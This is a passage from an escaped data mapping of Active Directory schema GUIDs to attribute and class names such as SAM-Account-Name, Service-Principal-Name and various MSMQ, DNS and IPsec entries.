\"host\",\n \"b39a61be-ed07-4cab-9a4a-4963ed0141e1\": \"ms-ds-Schema-Extensions\",\n \"9a0dc322-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Quota\",\n \"bf967a28-0de6-11d0-a285-00aa003049e2\": \"rpc-Ns-Profile-Entry\",\n \"2e28edee-ed7c-453f-afe4-93bd86f2174f\": \"ms-DS-Claim-Possible-Values\",\n \"7bfdcb8a-4807-11d1-a9c3-0000f80367c1\": \"Index-Server-Catalog\",\n \"f072230f-aef5-11d1-bdcf-0000f80367c1\": \"ACS-RSVP-Account-Files-Location\",\n \"f0f8ff83-1191-11d0-a060-00aa006c33ed\": \"Icon-Path\",\n \"4c51e316-f628-43a5-b06b-ffb695fcb4f3\": \"ms-DS-SD-Reference-Domain\",\n \"3bfe6748-b544-485a-b067-1b310c4334bf\": \"MSMQ-Recipient-FormatName\",\n \"29401c4a-7a27-11d0-afd6-00c04fd930c9\": \"rpc-Ns-Transfer-Syntax\",\n \"c66217b9-e48e-47f7-b7d5-6552b8afd619\": \"ms-DS-Claim-Value-Type\",\n \"4828cc14-1437-45bc-9b07-ad6f015e5f28\": \"inetOrgPerson\",\n \"bf967aaf-0de6-11d0-a285-00aa003049e2\": \"Security-Object\",\n \"1cb3559b-56d0-11d1-a9c6-0000f80367c1\": \"ACS-RSVP-Log-Files-Location\",\n \"7d6c0e92-7e20-11d0-afd6-00c04fd930c9\": \"Implemented-Categories\",\n \"4f146ae8-a4fe-4801-a731-f51848a4f4e4\": \"ms-DS-Security-Group-Extra-Classes\",\n \"2df90d81-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Routing-Service\",\n \"3e0abfd0-126a-11d0-a060-00aa006c33ed\": \"SAM-Account-Name\",\n \"eebc123e-bae6-4166-9e5b-29884a8b76b0\": \"ms-DS-Claim-Attribute-Source\",\n \"7f56127f-5301-11d1-a9c5-0000f80367c1\": \"ACS-Service-Type\",\n \"7bfdcb87-4807-11d1-a9c3-0000f80367c1\": \"IndexedScopes\",\n \"0e1b47d7-40a3-4b48-8d1b-4cac0c1cdf21\": \"ms-DS-Settings\",\n \"2df90d77-009f-11d2-aa4c-00c04fd7d83a\": \"MSMQ-Routing-Services\",\n \"6e7b626c-64f2-11d0-afd2-00c04fd930c9\": \"SAM-Account-Type\",\n \"6afb0e4c-d876-437c-aeb6-c3e41454c272\": \"ms-DS-Claim-Type-Applies-To-Class\",\n \"2df90d89-009f-11d2-aa4c-00c04fd7d83a\": \"Infrastructure-Update\",\n \"bf967a92-0de6-11d0-a285-00aa003049e2\": \"Server\",\n \"7f561279-5301-11d1-a9c5-0000f80367c1\": \"ACS-Time-Of-Day\",\n \"52458023-ca6a-11d0-afff-0000f80367c1\": \"Initial-Auth-Incoming\",\n \"c17c5602-bcb7-46f0-9656-6370ca884b72\": \"ms-DS-Site-Affinity\",\n \"8bf0221b-7a06-4d63-91f0-1499941813d3\": \"MSMQ-Secured-Source\",\n \"04d2d114-f799-4e9b-bcdc-90e8f5ba7ebe\": \"SAM-Domain-Updates\",\n \"52c8d13a-ce0b-4f57-892b-18f5a43a2400\": \"ms-DS-Claim-Shares-Possible-Values-With\",\n \"7f561280-5301-11d1-a9c5-0000f80367c1\": \"ACS-Total-No-Of-Flows\",\n \"52458024-ca6a-11d0-afff-0000f80367c1\": \"Initial-Auth-Outgoing\",\n \"789ee1eb-8c8e-4e4c-8cec-79b31b7617b5\": \"ms-DS-SPN-Suffixes\",\n \"9a0dc32d-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Service-Type\",\n \"dd712224-10e4-11d0-a05f-00aa006c33ed\": \"Schedule\",\n \"54d522db-ec95-48f5-9bbd-1880ebbb2180\": \"ms-DS-Claim-Shares-Possible-Values-With-BL\",\n \"07383086-91df-11d1-aebc-0000f80367c1\": \"Intellimirror-Group\",\n \"f780acc0-56f0-11d1-a9c6-0000f80367c1\": \"Servers-Container\",\n \"7cbd59a5-3b90-11d2-90cc-00c04fd91ab1\": \"ACS-Server-List\",\n \"f0f8ff90-1191-11d0-a060-00aa006c33ed\": \"Initials\",\n \"35319082-8c4a-4646-9386-c2949d49894d\": \"ms-DS-Tasks-For-Az-Role\",\n \"9a0dc33d-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Services\",\n \"bf967a2b-0de6-11d0-a285-00aa003049e2\": \"Schema-Flags-Ex\",\n \"4d371c11-4cad-4c41-8ad2-b180ab2bd13c\": \"ms-DS-Members-Of-Resource-Property-List\",\n \"6d05fb41-246b-11d0-a9c8-00aa006c33ed\": \"Additional-Information\",\n \"96a7dd64-9118-11d1-aebc-0000f80367c1\": \"Install-Ui-Level\",\n \"a0dcd536-5158-42fe-8c40-c00a7ad37959\": \"ms-DS-Tasks-For-Az-Role-BL\",\n \"9a0dc33b-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Sign-Certificates\",\n \"bf967923-0de6-11d0-a285-00aa003049e2\": \"Schema-ID-GUID\",\n \"7469b704-edb0-4568-a5a5-59f4862c75a7\": \"ms-DS-Members-Of-Resource-Property-List-BL\",\n \"07383085-91df-11d1-aebc-0000f80367c1\": \"Intellimirror-SCP\",\n \"b7b13123-b82e-11d0-afee-0000f80367c1\": \"Service-Administration-Point\",\n \"032160be-9824-11d1-aec0-0000f80367c1\": \"Additional-Trusted-Service-Names\",\n \"bf96798c-0de6-11d0-a285-00aa003049e2\": \"Instance-Type\",\n \"b11c8ee2-5fcd-46a7-95f0-f38333f096cf\": \"ms-DS-Tasks-For-Az-Task\",\n \"3881b8ea-da3b-11d1-90a5-00c04fd91ab1\": \"MSMQ-Sign-Certificates-Mig\",\n \"f9fb64ae-93b4-11d2-9945-0000f87a57d4\": \"Schema-Info\",\n \"b47f510d-6b50-47e1-b556-772c79e4ffc4\": \"ms-SPP-CSVLK-Pid\",\n \"f0f8ff84-1191-11d0-a060-00aa006c33ed\": \"Address\",\n \"b7c69e60-2cc7-11d2-854e-00a0c983f608\": \"Inter-Site-Topology-Failover\",\n \"df446e52-b5fa-4ca2-a42f-13f98a526c8f\": \"ms-DS-Tasks-For-Az-Task-BL\",\n \"9a0dc332-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Sign-Key\",\n \"1e2d06b4-ac8f-11d0-afe3-00c04fd930c9\": \"Schema-Update\",\n \"a601b091-8652-453a-b386-87ad239b7c08\": \"ms-SPP-CSVLK-Partial-Product-Key\",\n \"26d97376-6070-11d1-a9c6-0000f80367c1\": \"Inter-Site-Transport\",\n \"bf967ab1-0de6-11d0-a285-00aa003049e2\": \"Service-Class\",\n \"f70b6e48-06f4-11d2-aa53-00c04fd7d83a\": \"Address-Book-Roots\",\n \"b7c69e5e-2cc7-11d2-854e-00a0c983f608\": \"Inter-Site-Topology-Generator\",\n \"2cc4b836-b63f-4940-8d23-ea7acf06af56\": \"ms-DS-User-Account-Control-Computed\",\n \"9a0dc337-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Site-1\",\n \"bf967a2c-0de6-11d0-a285-00aa003049e2\": \"Schema-Version\",\n \"9684f739-7b78-476d-8d74-31ad7692eef4\": \"ms-SPP-CSVLK-Sku-Id\",\n \"5fd42461-1262-11d0-a060-00aa006c33ed\": \"Address-Entry-Display-Table\",\n \"b7c69e5f-2cc7-11d2-854e-00a0c983f608\": \"Inter-Site-Topology-Renew\",\n \"add5cf10-7b09-4449-9ae6-2534148f8a72\": \"ms-DS-User-Password-Expiry-Time-Computed\",\n \"9a0dc338-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Site-2\",\n \"16f3a4c2-7e79-11d2-9921-0000f87a57d4\": \"Scope-Flags\",\n \"9b663eda-3542-46d6-9df0-314025af2bac\": \"ms-SPP-KMS-Ids\",\n \"26d97375-6070-11d1-a9c6-0000f80367c1\": \"Inter-Site-Transport-Container\",\n \"28630ec1-41d5-11d1-a9c1-0000f80367c1\": \"Service-Connection-Point\",\n \"5fd42462-1262-11d0-a060-00aa006c33ed\": \"Address-Entry-Display-Table-MSDOS\",\n \"bf96798d-0de6-11d0-a285-00aa003049e2\": \"International-ISDN-Number\",\n \"146eb639-bb9f-4fc1-a825-e29e00c77920\": \"ms-DS-UpdateScript\",\n \"fd129d8a-d57e-11d1-90a2-00c04fd91ab1\": \"MSMQ-Site-Foreign\",\n \"bf9679a8-0de6-11d0-a285-00aa003049e2\": \"Script-Path\",\n \"69bfb114-407b-4739-a213-c663802b3e37\": \"ms-SPP-Installation-Id\",\n \"16775781-47f3-11d1-a9c3-0000f80367c1\": \"Address-Home\",\n \"bf96798e-0de6-11d0-a285-00aa003049e2\": \"Invocation-Id\",\n \"773e93af-d3b4-48d4-b3f9-06457602d3d0\": \"ms-DS-Source-Object-DN\",\n \"9a0dc339-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Site-Gates\",\n \"c3dbafa6-33df-11d2-98b2-0000f87a57d4\": \"SD-Rights-Effective\",\n \"6e8797c4-acda-4a49-8740-b0bd05a9b831\": \"ms-SPP-Confirmation-Id\",\n \"b40ff825-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Base\",\n \"bf967ab2-0de6-11d0-a285-00aa003049e2\": \"Service-Instance\",\n \"5fd42463-1262-11d0-a060-00aa006c33ed\": \"Address-Syntax\",\n \"b40ff81f-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Data\",\n \"778ff5c9-6f4e-4b74-856a-d68383313910\": \"ms-DS-KrbTgt-Link\",\n \"e2704852-3b7b-11d2-90cc-00c04fd91ab1\": \"MSMQ-Site-Gates-Mig\",\n \"bf967a2d-0de6-11d0-a285-00aa003049e2\": \"Search-Flags\",\n \"098f368e-4812-48cd-afb7-a136b96807ed\": \"ms-SPP-Online-License\",\n \"5fd42464-1262-11d0-a060-00aa006c33ed\": \"Address-Type\",\n \"b40ff81e-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Data-Type\",\n \"185c7821-3749-443a-bd6a-288899071adb\": \"ms-DS-Revealed-Users\",\n \"9a0dc340-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Site-ID\",\n \"bf967a2e-0de6-11d0-a285-00aa003049e2\": \"Search-Guide\",\n \"67e4d912-f362-4052-8c79-42f45ba7b221\": \"ms-SPP-Phone-License\",\n \"b40ff826-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Filter\",\n \"5fe69b0b-e146-4f15-b0ab-c1e5d488e094\": \"simpleSecurityObject\",\n \"553fd038-f32e-11d0-b0bc-00c04fd8dca6\": \"Admin-Context-Menu\",\n \"b40ff823-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Filter-Reference\",\n \"1d3c2d18-42d0-4868-99fe-0eca1e6fa9f3\": \"ms-DS-Has-Full-Replica-NCs\",\n \"ffadb4b2-de39-11d1-90a5-00c04fd91ab1\": \"MSMQ-Site-Name\",\n \"01072d9a-98ad-4a53-9744-e83e287278fb\": \"secretary\",\n \"0353c4b5-d199-40b0-b3c5-deb32fd9ec06\": \"ms-SPP-Config-License\",\n \"bf967918-0de6-11d0-a285-00aa003049e2\": \"Admin-Count\",\n \"b40ff81d-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-ID\",\n \"15585999-fd49-4d66-b25d-eeb96aba8174\": \"ms-DS-Never-Reveal-Group\",\n \"422144fa-c17f-4649-94d6-9731ed2784ed\": \"MSMQ-Site-Name-Ex\",\n \"bf967a2f-0de6-11d0-a285-00aa003049e2\": \"Security-Identifier\",\n \"1075b3a1-bbaf-49d2-ae8d-c4f25c823303\": \"ms-SPP-Issuance-License\",\n \"b40ff828-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-ISAKMP-Policy\",\n \"bf967ab3-0de6-11d0-a285-00aa003049e2\": \"Site\",\n \"bf967919-0de6-11d0-a285-00aa003049e2\": \"Admin-Description\",\n \"b40ff820-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-ISAKMP-Reference\",\n \"303d9f4a-1dd6-4b38-8fc5-33afe8c988ad\": \"ms-DS-Reveal-OnDemand-Group\",\n \"9a0dc32a-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Sites\",\n \"bf967a31-0de6-11d0-a285-00aa003049e2\": \"See-Also\",\n \"19d706eb-4d76-44a2-85d6-1c342be3be37\": \"ms-TPM-Srk-Pub-Thumbprint\",\n \"bf96791a-0de6-11d0-a285-00aa003049e2\": \"Admin-Display-Name\",\n \"b40ff81c-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Name\",\n \"aa156612-2396-467e-ad6a-28d23fdb1865\": \"ms-DS-Secondary-KrbTgt-Number\",\n \"9a0dc329-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Transactional\",\n \"ddac0cf2-af8f-11d0-afeb-00c04fd930c9\": \"Seq-Notification\",\n \"c894809d-b513-4ff8-8811-f4f43f5ac7bc\": \"ms-TPM-Owner-Information-Temp\",\n \"b40ff827-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Negotiation-Policy\",\n \"d50c2cde-8951-11d1-aebc-0000f80367c1\": \"Site-Link\",\n \"18f9b67d-5ac6-4b3b-97db-d0a406afb7ba\": \"Admin-Multiselect-Property-Pages\",\n \"07383075-91df-11d1-aebc-0000f80367c1\": \"IPSEC-Negotiation-Policy-Action\",\n \"94f6f2ac-c76d-4b5e-b71f-f332c3e93c22\": \"ms-DS-Revealed-DSAs\",\n \"c58aae32-56f9-11d2-90d0-00c04fd91ab1\": \"MSMQ-User-Sid\",\n \"bf967a32-0de6-11d0-a285-00aa003049e2\": \"Serial-Number\",\n \"ea1b7b93-5e48-46d5-bc6c-4df4fda78a35\": \"ms-TPM-Tpm-Information-For-Computer\",\n \"52458038-ca6a-11d0-afff-0000f80367c1\": \"Admin-Property-Pages\",\n \"b40ff822-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Negotiation-Policy-Reference\",\n \"5dd68c41-bfdf-438b-9b5d-39d9618bf260\": \"ms-DS-KrbTgt-Link-BL\",\n \"9a0dc336-c100-11d1-bbc5-0080c76670c0\": \"MSMQ-Version\",\n \"09dcb7a0-165f-11d0-a064-00aa006c33ed\": \"Server-Name\",\n \"14fa84c9-8ecd-4348-bc91-6d3ced472ab7\": \"ms-TPM-Tpm-Information-For-Computer-BL\",\n \"b40ff829-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-NFA\",\n \"d50c2cdf-8951-11d1-aebc-0000f80367c1\": \"Site-Link-Bridge\",\n \"9a7ad940-ca53-11d1-bbd0-0080c76670c0\": \"Allowed-Attributes\",\n \"07383074-91df-11d1-aebc-0000f80367c1\": \"IPSEC-Negotiation-Policy-Type\",\n \"c8bc72e0-a6b4-48f0-94a5-fd76a88c9987\": \"ms-DS-Is-Full-Replica-For\",\n \"db0c9085-c1f2-11d1-bbc5-0080c76670c0\": \"msNPAllowDialin\",\n \"26d9736d-6070-11d1-a9c6-0000f80367c1\": \"Server-Reference\",\n \"0be0dd3b-041a-418c-ace9-2f17d23e9d42\": \"ms-DNS-Keymaster-Zones\",\n \"9a7ad941-ca53-11d1-bbd0-0080c76670c0\": \"Allowed-Attributes-Effective\",\n \"b40ff821-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-NFA-Reference\",\n \"ff155a2a-44e5-4de0-8318-13a58988de4f\": \"ms-DS-Is-Domain-For\",\n \"db0c9089-c1f2-11d1-bbc5-0080c76670c0\": \"msNPCalledStationID\",\n \"26d9736e-6070-11d1-a9c6-0000f80367c1\": \"Server-Reference-BL\",\n \"aa12854c-d8fc-4d5e-91ca-368b8d829bee\": \"ms-DNS-Is-Signed\",\n \"b7b13121-b82e-11d0-afee-0000f80367c1\": \"Ipsec-Policy\",\n \"7a4117da-cd67-11d0-afff-0000f80367c1\": \"Sites-Container\",\n \"9a7ad942-ca53-11d1-bbd0-0080c76670c0\": \"Allowed-Child-Classes\",\n \"b40ff824-427a-11d1-a9c2-0000f80367c1\": \"Ipsec-Owners-Reference\",\n \"37c94ff6-c6d4-498f-b2f9-c6f7f8647809\": \"ms-DS-Is-Partial-Replica-For\",\n \"db0c908a-c1f2-11d1-bbc5-0080c76670c0\": \"msNPCallingStationID\",\n \"bf967a33-0de6-11d0-a285-00aa003049e2\": \"Server-Role\",\n \"c79f2199-6da1-46ff-923c-1f3f800c721e\": \"ms-DNS-Sign-With-NSEC3\",\n \"9a7ad943-ca53-11d1-bbd0-0080c76670c0\": \"Allowed-Child-Classes-Effective\",\n \"b7b13118-b82e-11d0-afee-0000f80367c1\": \"Ipsec-Policy-Reference\",\n \"fe01245a-341f-4556-951f-48c033a89050\": \"ms-DS-Is-User-Cachable-At-Rodc\",\n \"db0c908e-c1f2-11d1-bbc5-0080c76670c0\": \"msNPSavedCallingStationID\",\n \"bf967a34-0de6-11d0-a285-00aa003049e2\": \"Server-State\",\n \"7bea2088-8ce2-423c-b191-66ec506b1595\": \"ms-DNS-NSEC3-OptOut\",\n \"bf967a9e-0de6-11d0-a285-00aa003049e2\": \"Leaf\",\n \"bf967ab5-0de6-11d0-a285-00aa003049e2\": \"Storage\",\n \"00fbf30c-91fe-11d1-aebc-0000f80367c1\": \"Alt-Security-Identities\",\n \"00fbf30d-91fe-11d1-aebc-0000f80367c1\": \"Is-Critical-System-Object\",\n \"cbdad11c-7fec-387b-6219-3a0627d9af81\": \"ms-DS-Revealed-List\",\n \"db0c909c-c1f2-11d1-bbc5-0080c76670c0\": \"msRADIUSCallbackNumber\",\n \"b7b1311c-b82e-11d0-afee-0000f80367c1\": \"Service-Binding-Information\",\n \"0dc063c1-52d9-4456-9e15-9c2434aafd94\": \"ms-DNS-Maintain-Trust-Anchor\",\n \"45b01500-c419-11d1-bbc9-0080c76670c0\": \"ANR\",\n \"28630ebe-41d5-11d1-a9c1-0000f80367c1\": \"Is-Defunct\",\n \"aa1c88fd-b0f6-429f-b2ca-9d902266e808\": \"ms-DS-Revealed-List-BL\",\n \"db0c90a4-c1f2-11d1-bbc5-0080c76670c0\": \"msRADIUSFramedIPAddress\",\n \"bf967a35-0de6-11d0-a285-00aa003049e2\": \"Service-Class-ID\",\n \"5c5b7ad2-20fa-44bb-beb3-34b9c0f65579\": \"ms-DNS-DS-Record-Algorithms\",\n \"1be8f17d-a9ff-11d0-afe2-00c04fd930c9\": \"Licensing-Site-Settings\",\n \"b7b13124-b82e-11d0-afee-0000f80367c1\": \"Subnet\",\n \"96a7dd65-9118-11d1-aebc-0000f80367c1\": \"App-Schema-Version\",\n \"bf96798f-0de6-11d0-a285-00aa003049e2\": \"Is-Deleted\",\n \"011929e6-8b5d-4258-b64a-00b0b4949747\": \"ms-DS-Last-Successful-Interactive-Logon-Time\",\n \"db0c90a9-c1f2-11d1-bbc5-0080c76670c0\": \"msRADIUSFramedRoute\",\n \"bf967a36-0de6-11d0-a285-00aa003049e2\": \"Service-Class-Info\",\n \"27d93c40-065a-43c0-bdd8-cdf2c7d120aa\": \"ms-DNS-RFC5011-Key-Rollovers\",\n \"dd712226-10e4-11d0-a05f-00aa006c33ed\": \"Application-Name\",\n \"f4c453f0-c5f1-11d1-bbcb-0080c76670c0\": \"Is-Ephemeral\",\n \"c7e7dafa-10c3-4b8b-9acd-54f11063742e\": \"ms-DS-Last-Failed-Interactive-Logon-Time\",\n \"db0c90b6-c1f2-11d1-bbc5-0080c76670c0\": \"msRADIUSServiceType\",\n \"b7b1311d-b82e-11d0-afee-0000f80367c1\": \"Service-Class-Name\",\n \"ff9e5552-7db7-4138-8888-05ce320a0323\": \"ms-DNS-NSEC3-Hash-Algorithm\",\n \"ddac0cf5-af8f-11d0-afeb-00c04fd930c9\": \"Link-Track-Object-Move-Table\",\n \"b7b13125-b82e-11d0-afee-0000f80367c1\": \"Subnet-Container\",\n \"8297931d-86d3-11d0-afda-00c04fd930c9\": \"Applies-To\",\n \"bf967991-0de6-11d0-a285-00aa003049e2\": \"Is-Member-Of-DL\",\n \"dc3ca86f-70ad-4960-8425-a4d6313d93dd\": \"ms-DS-Failed-Interactive-Logon-Count\",\n \"db0c90c5-c1f2-11d1-bbc5-0080c76670c0\": \"msRASSavedCallbackNumber\",\n \"28630eb8-41d5-11d1-a9c1-0000f80367c1\": \"Service-DNS-Name\",\n \"13361665-916c-4de7-a59d-b1ebbd0de129\": \"ms-DNS-NSEC3-Random-Salt-Length\",\n \"ba305f75-47e3-11d0-a1a6-00c04fd930c9\": \"Asset-Number\",\n \"19405b9d-3cfa-11d1-a9c0-0000f80367c1\": \"Is-Member-Of-Partial-Attribute-Set\",\n \"c5d234e5-644a-4403-a665-e26e0aef5e98\": \"ms-DS-Failed-Interactive-Logon-Count-At-Last-Successful-Logon\",\n \"db0c90c6-c1f2-11d1-bbc5-0080c76670c0\": \"msRASSavedFramedIPAddress\",\n \"28630eba-41d5-11d1-a9c1-0000f80367c1\": \"Service-DNS-Name-Type\",\n \"80b70aab-8959-4ec0-8e93-126e76df3aca\": \"ms-DNS-NSEC3-Iterations\",\n \"ddac0cf7-af8f-11d0-afeb-00c04fd930c9\": \"Link-Track-OMT-Entry\",\n \"0296c11c-40da-11d1-a9c0-0000f80367c1\": \"Assistant\",\n \"19405b9c-3cfa-11d1-a9c0-0000f80367c1\": \"Is-Privilege-Holder\",\n \"31f7b8b6-c9f8-4f2d-a37b-58a823030331\": \"ms-DS-USN-Last-Sync-Success\",\n \"db0c90c7-c1f2-11d1-bbc5-0080c76670c0\": \"msRASSavedFramedRoute\",\n \"bf967a37-0de6-11d0-a285-00aa003049e2\": \"Service-Instance-Version\",\n \"8f4e317f-28d7-442c-a6df-1f491f97b326\": \"ms-DNS-DNSKEY-Record-Set-TTL\",\n \"bf967ab8-0de6-11d0-a285-00aa003049e2\": \"Trusted-Domain\",\n \"398f63c0-ca60-11d1-bbd1-0000f81f10c0\": \"Assoc-NT-Account\",\n \"8fb59256-55f1-444b-aacb-f5b482fe3459\": \"Is-Recycled\",\n \"78fc5d84-c1dc-3148-8984-58f792d41d3e\": \"ms-DS-Value-Type-Reference\",\n \"bf9679d3-0de6-11d0-a285-00aa003049e2\": \"Must-Contain\",\n \"f3a64788-5306-11d1-a9c5-0000f80367c1\": \"Service-Principal-Name\",\n \"29869b7c-64c4-42fe-97d5-fbc2fa124160\": \"ms-DNS-DS-Record-Set-TTL\",\n \"ddac0cf6-af8f-11d0-afeb-00c04fd930c9\": \"Link-Track-Vol-Entry\",\n \"3320fc38-c379-4c17-a510-1bdf6133c5da\": \"associatedDomain\",\n \"bf967992-0de6-11d0-a285-00aa003049e2\": \"Is-Single-Valued\",\n \"ab5543ad-23a1-3b45-b937-9b313d5474a8\": \"ms-DS-Value-Type-Reference-BL\",\n \"80212840-4bdc-11d1-a9c4-0000f80367c1\": \"Name-Service-Flags\",\n \"7d6c0e97-7e20-11d0-afd6-00c04fd930c9\": \"Setup-Command\",\n \"03d4c32e-e217-4a61-9699-7bbc4729a026\": \"ms-DNS-Signature-Inception-Offset\",\n \"281416e2-1968-11d0-a28f-00aa003049e2\": \"Type-Library\",\n \"f7fbfc45-85ab-42a4-a435-780e62f7858b\": \"associatedName\",\n \"bac80572-09c4-4fa9-9ae6-7628d7adbe0e\": \"jpegPhoto\",\n \"8a0560c1-97b9-4811-9db7-dc061598965b\": \"ms-DS-Optional-Feature-Flags\",\n \"bf9679d6-0de6-11d0-a285-00aa003049e2\": \"NC-Name\",\n \"553fd039-f32e-11d0-b0bc-00c04fd8dca6\": \"Shell-Context-Menu\",\n \"f6b0f0be-a8e4-4468-8fd9-c3c47b8722f9\": \"ms-DNS-Secure-Delegation-Polling-Period\",\n \"ddac0cf4-af8f-11d0-afeb-00c04fd930c9\": \"Link-Track-Volume-Table\",\n \"fa4693bb-7bc2-4cb9-81a8-c99c43b7905e\": \"attributeCertificateAttribute\",\n \"bf967993-0de6-11d0-a285-00aa003049e2\": \"Keywords\",\n \"bf9679d8-0de6-11d0-a285-00aa003049e2\": \"NETBIOS-Name\",\n \"52458039-ca6a-11d0-afff-0000f80367c1\": \"Shell-Property-Pages\",\n \"3443d8cd-e5b6-4f3b-b098-659a0214a079\": \"ms-DNS-Signing-Key-Descriptors\",\n \"bf967abb-0de6-11d0-a285-00aa003049e2\": \"Volume\",\n \"cb843f80-48d9-11d1-a9c3-0000f80367c1\": \"Attribute-Display-Names\",\n \"1677581f-47f3-11d1-a9c3-0000f80367c1\": \"Knowledge-Information\",\n \"07383076-91df-11d1-aebc-0000f80367c1\": \"netboot-Allow-New-Clients\",\n \"45b01501-c419-11d1-bbc9-0080c76670c0\": \"Short-Server-Name\",\n \"b7673e6d-cad9-4e9e-b31a-63e8098fdd63\": \"ms-DNS-Signing-Keys\",\n \"bf967aa0-0de6-11d0-a285-00aa003049e2\": \"Locality\",\n \"bf967922-0de6-11d0-a285-00aa003049e2\": \"Attribute-ID\",\n \"c569bb46-c680-44bc-a273-e6c227d71b45\": \"labeledURI\",\n \"0738307b-91df-11d1-aebc-0000f80367c1\": \"netboot-Answer-Only-Valid-Clients\",\n \"3e74f60e-3e73-11d1-a9c0-0000f80367c1\": \"Show-In-Address-Book\",\n \"28c458f5-602d-4ac9-a77c-b3f1be503a7e\": \"ms-DNS-DNSKEY-Records\",\n \"ad44bb41-67d5-4d88-b575-7b20674e76d8\": \"PosixAccount\",\n \"bf967924-0de6-11d0-a285-00aa003049e2\": \"Attribute-Security-GUID\",\n \"1fbb0be8-ba63-11d0-afef-0000f80367c1\": \"Last-Backup-Restoration-Time\",\n \"0738307a-91df-11d1-aebc-0000f80367c1\": \"netboot-Answer-Requests\",\n \"bf967984-0de6-11d0-a285-00aa003049e2\": \"Show-In-Advanced-View-Only\",\n \"285c6964-c11a-499e-96d8-bf7c75a223c6\": \"ms-DNS-Parent-Has-Secure-Delegation\",\n \"52ab8671-5709-11d1-a9c6-0000f80367c1\": \"Lost-And-Found\",\n \"bf967925-0de6-11d0-a285-00aa003049e2\": \"Attribute-Syntax\",\n \"bf967995-0de6-11d0-a285-00aa003049e2\": \"Last-Content-Indexed\",\n \"5643ff81-35b6-4ca9-9512-baf0bd0a2772\": \"ms-FRS-Hub-Member\",\n \"07383079-91df-11d1-aebc-0000f80367c1\": \"netboot-Current-Client-Count\",\n \"17eb4278-d167-11d0-b002-0000f80367c1\": \"SID-History\",\n \"ba340d47-2181-4ca0-a2f6-fae4479dab2a\": \"ms-DNS-Propagation-Time\",\n \"5b6d8467-1a18-4174-b350-9cc6e7b4ac8d\": \"ShadowAccount\",\n \"9a7ad944-ca53-11d1-bbd0-0080c76670c0\": \"Attribute-Types\",\n \"52ab8670-5709-11d1-a9c6-0000f80367c1\": \"Last-Known-Parent\",\n \"92aa27e0-5c50-402d-9ec1-ee847def9788\": \"ms-FRS-Topology-Pref\",\n \"3e978921-8c01-11d0-afda-00c04fd930c9\": \"Netboot-GUID\",\n \"2a39c5b2-8960-11d1-aebc-0000f80367c1\": \"Signature-Algorithms\",\n \"aff16770-9622-4fbc-a128-3088777605b9\": \"ms-DNS-NSEC3-User-Salt\",\n \"11b6cc94-48c4-11d1-a9c3-0000f80367c1\": \"Meeting\",\n \"d0e1d224-e1a0-42ce-a2da-793ba5244f35\": \"audio\",\n \"bf967996-0de6-11d0-a285-00aa003049e2\": \"Last-Logoff\",\n \"1a861408-38c3-49ea-ba75-85481a77c655\": \"ms-DFSR-Version\",\n \"532570bd-3d77-424f-822f-0d636dc6daad\": \"Netboot-DUID\",\n \"3e978924-8c01-11d0-afda-00c04fd930c9\": \"Site-GUID\",\n \"387d9432-a6d1-4474-82cd-0a89aae084ae\": \"ms-DNS-NSEC3-Current-Salt\",\n \"2a9350b8-062c-4ed0-9903-dde10d06deba\": \"PosixGroup\",\n \"6da8a4fe-0e52-11d0-a286-00aa003049e2\": \"Auditing-Policy\",\n \"bf967997-0de6-11d0-a285-00aa003049e2\": \"Last-Logon\",\n \"78f011ec-a766-4b19-adcf-7b81ed781a4d\": \"ms-DFSR-Extension\",\n \"3e978920-8c01-11d0-afda-00c04fd930c9\": \"Netboot-Initialization\",\n \"d50c2cdd-8951-11d1-aebc-0000f80367c1\": \"Site-Link-List\",\n \"07831919-8f94-4fb6-8a42-91545dccdad3\": \"ms-Authz-Effective-Security-Policy\",\n \"c9010e74-4e58-49f7-8a89-5e3e2340fcf8\": \"ms-COM-Partition\",\n \"bf967928-0de6-11d0-a285-00aa003049e2\": \"Authentication-Options\",\n \"c0e20a04-0e5a-4ff3-9482-5efeaecd7060\": \"Last-Logon-Timestamp\",\n \"d7d5e8c1-e61f-464f-9fcf-20bbe0a2ec54\": \"ms-DFSR-RootPath\",\n \"0738307e-91df-11d1-aebc-0000f80367c1\": \"netboot-IntelliMirror-OSes\",\n \"d50c2cdc-8951-11d1-aebc-0000f80367c1\": \"Site-List\",\n \"b946bece-09b5-4b6a-b25a-4b63a330e80e\": \"ms-Authz-Proposed-Security-Policy\",\n \"2517fadf-fa97-48ad-9de6-79ac5721f864\": \"IpService\",\n \"1677578d-47f3-11d1-a9c3-0000f80367c1\": \"Authority-Revocation-List\",\n \"bf967998-0de6-11d0-a285-00aa003049e2\": \"Last-Set-Time\",\n \"90b769ac-4413-43cf-ad7a-867142e740a3\": \"ms-DFSR-RootSizeInMb\",\n \"07383077-91df-11d1-aebc-0000f80367c1\": \"netboot-Limit-Clients\",\n \"3e10944c-c354-11d0-aff8-0000f80367c1\": \"Site-Object\",\n \"8e1685c6-3e2f-48a2-a58d-5af0ea789fa0\": \"ms-Authz-Last-Effective-Security-Policy\",\n \"250464ab-c417-497a-975a-9e0d459a7ca1\": \"ms-COM-PartitionSet\",\n \"bf96792c-0de6-11d0-a285-00aa003049e2\": \"Auxiliary-Class\",\n \"7d6c0e9c-7e20-11d0-afd6-00c04fd930c9\": \"Last-Update-Sequence\",\n 